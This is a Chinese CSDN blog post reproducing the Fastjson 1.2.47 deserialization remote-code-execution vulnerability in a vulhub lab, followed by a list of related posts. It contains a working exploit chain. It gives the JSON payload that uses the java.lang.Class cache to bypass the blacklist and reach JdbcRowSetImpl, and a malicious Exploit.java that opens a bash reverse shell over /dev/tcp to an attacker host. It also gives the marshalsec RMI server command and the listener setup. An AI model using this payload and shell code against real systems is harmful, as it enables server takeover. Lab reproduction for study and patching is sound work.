菜鸡一枚(勿喷)复现Fastjson「=1.2.47反序列化漏洞

最新推荐文章于 2024-08-13 14:40:36 发布
置顶 最新推荐文章于 2024-08-13 14:40:36 发布
阅读量635 收藏
点赞数
分类专栏: fastjson 反序列化 远程代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/S_yd1/article/details/107233508
版权

0x00 前言

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。对版本小于1.2.48的版本通杀,autoType为关闭状态也可使用。 loadClass中默认cache设置为true,利用分为2步执行,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.JdbcRowSetImpl这个类,绕过了黑名单机制。

0x02 影响范围

Fastjson1.2.47以及之前的版本

0x03 环境搭建

Ubuntu搭建vulhub,一键启动就OK,地址https://vulhub.org/

成功搭建环境:

太菜也没啥油水,直接进入正题哇。

0x04 漏洞利用

靶机A:192.168.1.105

主机B:192.168.1.100:8888(启web服务)

主机C:192.168.1.100:9999(启rmi服务)

主机B、C可为同一主机(太菜,复现的时候老纠结)

总体流程:

靶机A收到攻击者发起的fastjson反序列化payload请求,触发反序列化漏洞,靶机A寻找rmi://主机C:9999/Exploit进行远程方法调用,rmi找到http://主机B:8888/Exploit.class 文件传递给靶机A,最终执行恶意java类Exploit.class 文件中的内容

fastjson反序列化payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.100:9999/Exploit",
        "autoCommit":true
    }
}

恶意java类exploit文件内容:

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/xx.xx.xx.xx/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

使用javac编译Exploit.java

javac Exploit.java

主机B启web服务,存放恶意java类

构造url:如http://192.168.1.100/Exploit.class可直接下载:

主机C:借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类Exploit.class

marshalsec-0.0.3-SNAPSHOT-all.jar

链接:https://pan.baidu.com/s/1q3_8g1Ix3hgPRbhRljr3Og 
提取码:g3wa

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.100:8888/#Exploit" 9999

此时rmi服务已就绪,等待接收靶机的请求

主机B:开启NC监听1888端口:

向靶机发送fastjson反序列化漏洞payload:

靶机A收到攻击者发起的fastjson反序列化payload请求,触发反序列化漏洞,靶机A寻找rmi://主机C:9999/Exploit(开启rmi的)进行远程方法调用,rmi找到http://主机B:8888/Exploit.class (web服务的)文件传递给靶机A,最终执行恶意java类Exploit.class 文件中的内容

反弹shell成功:

 

 

参考链接

https://freeerror.org/d/512-fastjson-1-2-24-1-2-47-rce

https://mp.weixin.qq.com/s/sWOuXnMd7r0q8W-sInMhGQ

我欲乘风_t
关注
专栏目录
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 441
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson1.2.47反序列化漏洞复现
whojoe的博客
05-22 1510
fastjson1.2.47反序列化漏洞复现环境搭建启动docker下载环境生成docker环境漏洞检测区分 Fastjson 和 Jackson漏洞复现kali下切换java版本maven编译kali监听测试外联编译Exploit.java准备LDAP服务和Web服务监听shell发送数据包参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 生成docker环境 cd
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
最新发布
小司机的奥拓
08-13 875
反序列化漏洞是一种安全漏洞,它允许攻击者将恶意代码注入到应用程序中。这种漏洞通常发生在应用程序从不安全的来源反序列化数据时。当应用程序反序列化数据时,它将数据从一种格式(例如JSON或XML)转换为另一种格式(例如对象或列表)。如果应用程序不检查数据的安全性,攻击者就可以将恶意代码注入到数据中。当应用程序反序列化数据时,恶意代码就会被执行,这可能导致应用程序被攻陷。首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法。
反序列化利用工具_Fastjson反序列化漏洞的检测和利用
weixin_30758169的博客
01-27 4797
Fastjson是Alibaba开发的,Java语言编写的高性能Json库,号称Java语言中最快的Json库。针对Fastjson反序列化漏洞原理分析和Poc网上以及有很多,本文仅分享如何快速发现Fastjson反序列化漏洞,方便安全测试人员开展安全测试及修补漏洞。文章中涉及到的工具和源码仅供安全测试和学习使用,否则后果自负,与作者无关。0x01反序列化原理Fastjson反序列化,...
fastjson反序列化漏洞利用
weixin_44414845的博客
07-13 856
漏洞利用环境和payload参考君来自:环境搭建注意点:配置一个好的镜像源。fastjson docker环境启动和关闭。
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 2518
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
shiro 内存马_深入利用Shiro反序列化漏洞
weixin_39879674的博客
12-22 2850
0x00:背景​ shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先de...
CTFSHOW 菜鸡杯 misc部分题目复现
wu_zh1_hui的博客
08-30 606
1.猎兔 下载之后给了一张图片 看起来没什么问题 放进stegslove 发现在通道零的地方出现了异常,猜测是lsb隐写,就拉去分析 在竖向绿色通道发现隐隐约约的flag标志,但是完全没头绪。 后来突然发现图片的尺寸有问题,于是找了大佬们的脚本爆破一下尺寸 import zlib import struct filename = '1.png' with open(filename, 'rb') as f: all_b = f.read() crc32key = int(all_b[
计算机组成原理实验一实验报告免费下载(我是菜鸡)
06-12
5. `adder.v`中,加法器接收两个32位的输入和一个进位输入,产生一个32位的加法结果和一个高位进位输出。使用“+”运算符,由综合工具自动生成高效的加法器逻辑。 6. 添加了`lcd_module.dcp`,用于连接LCD显示模块。...
Android框架之路——Json解析一篇就够(原生技术+Gson+FastJson
等一杯咖啡的博客
04-30 3795
一、简介: JSON(JavaScript Object Notation, JS 对象标记) 是一种轻量级的数据交换格式。它基于 ECMAScript 规范的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。 基本写一个涉及网络请求数据的App
一个菜鸡学生的自我修养
06-04
一个菜鸡学生的自我修养
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Fastjson反序列化漏洞
UKK
06-20 3201
Fastjson反序列化漏洞 http://www.ifind.cc/view/231
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2759
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
fastjson反序列化漏洞
谢公子的博客
12-27 2427
Fastjson Fastjson是一个阿里巴巴开源的一款使用Java语言编写的高性能功能完善的JSON库,通常被用于将Java Bean和JSON 字符串之间进行转换。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。但是,从诞生之初,fastjson就多次被爆出存在反序列化漏洞。并且,每次都和autoType有关!那么,什
Fastjson2 <== 2.0.26反序列漏洞
黑剑
02-28 1822
根据@Y4TACKER作者在2023-03-20发布了一篇关于Fastjson原生反序列化的文章,文章中引入注入的是利用条件限制,不常常关注漏洞预警或者内容的几乎都是未发觉Fastjson2 到Fastjson2 2.0.26版本都有问题,其实如果单独去使用一些关键词去搜索:Fastjson2漏洞Fastjson2 Payload的结果内容比较乱比较杂,几乎参杂了Fastjson1的SEO搜索内容,那么就可能在一时没注意的情况下直接滑过。
FASTJSON反序列化漏洞合集分析小记(一)
lmh666888的博客
06-26 1845
FASTJSON反序列化漏洞合集分析小记
Fastjson反序列化漏洞(自学)
m0_64481831的博客
03-04 1152
Fastjson是Java的一个库,可以将Java对象转化为JSON格式的字符串,也可以将JSON格式的字符串转化为Java对象。Fastjson调用toJSONString()方法即可将对象转换成JSON字符串,parseObject()方法将JSON字符串转换成对象。Fastjson是Java的一个库,调用toJSONString方法将对象转换成字符串,调用parseObject方法将字符串转换为对象。
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3762
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值